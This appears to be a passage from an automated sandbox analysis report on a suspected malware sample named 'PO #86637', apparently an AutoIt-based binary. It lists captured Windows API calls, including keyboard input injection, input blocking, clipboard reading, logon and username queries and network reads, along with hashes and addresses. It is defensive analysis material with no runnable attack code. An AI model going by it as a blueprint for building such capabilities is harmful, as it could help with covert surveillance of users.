                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: __wcsicollmouse_event
                      • String ID: DOWN
                      • API String ID: 1033544147-711622031
                      • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                      • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                      • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                      • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                      APIs
                      • GetKeyboardState.USER32(?), ref: 0044C3D2
                      • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                      • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                      • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                      • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: KeyboardMessagePostState$InputSend
                      • String ID:
                      • API String ID: 3031425849-0
                      • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                      • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                      • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                      • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                      APIs
                        • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                      • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                      • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ErrorLastinet_addrsocket
                      • String ID:
                      • API String ID: 4170576061-0
                      • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                      • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                      • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                      • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                      APIs
                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                      • IsWindowVisible.USER32 ref: 0047A368
                      • IsWindowEnabled.USER32 ref: 0047A378
                      • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
                      • IsIconic.USER32 ref: 0047A393
                      • IsZoomed.USER32 ref: 0047A3A1
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                      • String ID:
                      • API String ID: 292994002-0
                      • Opcode ID: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                      • Instruction ID: 143e3079ffab126fd184b85051f6534cdea6adf6d01d93e69c1b4810180b6228
                      • Opcode Fuzzy Hash: 0a48a302b729025e65be405b7f5f19fe679dbad6397f14c7d9a4bdd7ec3e43df
                      • Instruction Fuzzy Hash: 8F11A2322001119BE3219F2ADC05B9FB798AF80715F15842FF849E7250DBB8E85187A9
                      APIs
                        • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                      • CoInitialize.OLE32(00000000), ref: 00478442
                      • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0047845B
                      • CoUninitialize.OLE32 ref: 0047863C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                      • String ID: .lnk
                      • API String ID: 886957087-24824748
                      • Opcode ID: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                      • Instruction ID: cf4755465b87a828534c2837f83e1451e93ee4f6fe559e45c0b7480b45348b92
                      • Opcode Fuzzy Hash: a78490bbd6710ed4fb80770143ba5b6b6d69e34379d2ac1719b679a46047f49b
                      • Instruction Fuzzy Hash: 17816D70344301AFD210EB54CC82F5AB3E5AFC8B18F10896EF658DB2D1DAB5E945CB96
                      APIs
                      • OpenClipboard.USER32(?), ref: 0046DCE7
                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                      • GetClipboardData.USER32(0000000D), ref: 0046DD01
                      • CloseClipboard.USER32 ref: 0046DD0D
                      • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                      • CloseClipboard.USER32 ref: 0046DD41
                      • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                      • GetClipboardData.USER32(00000001), ref: 0046DD8D
                      • CloseClipboard.USER32 ref: 0046DD99
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                      • String ID:
                      • API String ID: 15083398-0
                      • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                      • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                      • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                      • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID: U$\
                      • API String ID: 4104443479-100911408
                      • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                      • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                      • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                      • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                      APIs
                      • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                      • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                      • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Find$File$CloseFirstNext
                      • String ID:
                      • API String ID: 3541575487-0
                      • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                      • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                      • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                      • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                      APIs
                      • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                      • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                      • FindClose.KERNEL32(00000000), ref: 004339EB
                      Similarity
                      • API ID: FileFind$AttributesCloseFirst
                      • String ID:
                      • API String ID: 48322524-0
                      • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                      • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                      • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                      • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                      APIs
                      • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                      • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                        • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                      Similarity
                      • API ID: Internet$AvailableDataErrorFileLastQueryRead
                      • String ID:
                      • API String ID: 901099227-0
                      • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                      • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                      • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                      • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                      APIs
                      • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                      Similarity
                      • API ID: Proc
                      • String ID:
                      • API String ID: 2346855178-0
                      • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                      • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                      • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                      • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                      APIs
                      • BlockInput.USER32(00000001), ref: 0045A38B
                      Similarity
                      • API ID: BlockInput
                      • String ID:
                      • API String ID: 3456056419-0
                      • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                      • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                      • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                      • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                      APIs
                      • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                      Similarity
                      • API ID: LogonUser
                      • String ID:
                      • API String ID: 1244722697-0
                      • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                      • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                      • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                      • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                      APIs
                      • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                      Similarity
                      • API ID: NameUser
                      • String ID:
                      • API String ID: 2645101109-0
                      • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                      • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                      • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                      • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                      • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                      • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                      • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                      Strings
                      Similarity
                      • API ID:
                      • String ID: N@
                      • API String ID: 0-1509896676
                      • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                      • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                      • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                      • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                      • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                      • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                      • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                      • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                      • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                      • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                      • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                      • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                      • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                      • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                      • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                      • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                      APIs
                      • DeleteObject.GDI32(?), ref: 0045953B
                      • DeleteObject.GDI32(?), ref: 00459551
                      • DestroyWindow.USER32(?), ref: 00459563
                      • GetDesktopWindow.USER32 ref: 00459581
                      • GetWindowRect.USER32(00000000), ref: 00459588
                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                      • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                      • GetClientRect.USER32(00000000,?), ref: 004596F8
                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                      • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                      • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                      • GlobalLock.KERNEL32(00000000), ref: 0045978F
                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                      • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                      • CloseHandle.KERNEL32(00000000), ref: 004597AC
                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                      • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                      • GlobalFree.KERNEL32(00000000), ref: 004597E2
                      • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                      • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                      • ShowWindow.USER32(?,00000004), ref: 00459865
                      • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                      • GetStockObject.GDI32(00000011), ref: 004598CD
                      • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                      • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                      • DeleteDC.GDI32(00000000), ref: 004598F8
                      • _wcslen.LIBCMT ref: 00459916
                      • _wcscpy.LIBCMT ref: 0045993A
                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                      • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                      • GetDC.USER32(00000000), ref: 004599FC
                      • SelectObject.GDI32(00000000,?), ref: 00459A0C
                      • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                      • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                      • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                      • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                      Strings
                      Similarity
                      • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock_wcscpy_wcslen
                      • String ID: $AutoIt v3$DISPLAY$static
                      • API String ID: 4040870279-2373415609
                      • Opcode ID: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                      • Instruction ID: 0470743097681e939cd033c9659fc80dd101af82a4c7fdd8c03ae3a829a790b9
                      • Opcode Fuzzy Hash: 6d6993f212ed0893db9275c3f84f169bec7eeddded5228c42ae13acbc858d7fb
                      • Instruction Fuzzy Hash: 92027D71600204EFDB14DF64CD89FAE7BB9BB48305F108569FA05AB292D7B4ED05CB68
                      APIs
                      • GetSysColor.USER32(00000012), ref: 0044181E
                      • SetTextColor.GDI32(?,?), ref: 00441826
                      • GetSysColorBrush.USER32(0000000F), ref: 0044183D
                      • GetSysColor.USER32(0000000F), ref: 00441849
                      • SetBkColor.GDI32(?,?), ref: 00441864
                      • SelectObject.GDI32(?,?), ref: 00441874
                      • InflateRect.USER32(?,000000FF,000000FF), ref: 004418AA
                      • GetSysColor.USER32(00000010), ref: 004418B2
                      • CreateSolidBrush.GDI32(00000000), ref: 004418B9
                      • FrameRect.USER32(?,?,00000000), ref: 004418CA
                      • DeleteObject.GDI32(?), ref: 004418D5
                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0044192F
                      • FillRect.USER32(?,?,?), ref: 00441970
                        • Part of subcall function 004308EF: GetSysColor.USER32(0000000E), ref: 00430913
                        • Part of subcall function 004308EF: SetTextColor.GDI32(?,00000000), ref: 0043091B
                        • Part of subcall function 004308EF: GetSysColorBrush.USER32(0000000F), ref: 0043094E
                        • Part of subcall function 004308EF: GetSysColor.USER32(0000000F), ref: 00430959
                        • Part of subcall function 004308EF: GetSysColor.USER32(00000011), ref: 00430979
                        • Part of subcall function 004308EF: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                        • Part of subcall function 004308EF: SelectObject.GDI32(?,00000000), ref: 0043099C
                        • Part of subcall function 004308EF: SetBkColor.GDI32(?,?), ref: 004309A6
                        • Part of subcall function 004308EF: SelectObject.GDI32(?,?), ref: 004309B4
                        • Part of subcall function 004308EF: InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                        • Part of subcall function 004308EF: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                        • Part of subcall function 004308EF: GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                        • Part of subcall function 004308EF: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateText$DeleteFillFrameLongMessageRoundSendSolidWindow
                      • String ID:
                      • API String ID: 69173610-0
                      • Opcode ID: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                      • Instruction ID: 7a723b7ebc9985c742df47702d768576d0729d4f0beaa2415310c4eb73739e4f
                      • Opcode Fuzzy Hash: fbb8d870229eb44a1def9ba3881ac6b42e654f1da7cb1ff5097cb3e0d6ff825e
                      • Instruction Fuzzy Hash: 76B15BB1508301AFD304DF64DD88A6FB7F8FB88720F104A2DF996922A0D774E945CB66
                      APIs
                      • DestroyWindow.USER32(?), ref: 004590F2
                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                      • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                      • GetClientRect.USER32(00000000,?), ref: 0045924E
                      • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                      • GetStockObject.GDI32(00000011), ref: 004592AC
                      • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                      • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                      • DeleteDC.GDI32(00000000), ref: 004592D6
                      • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
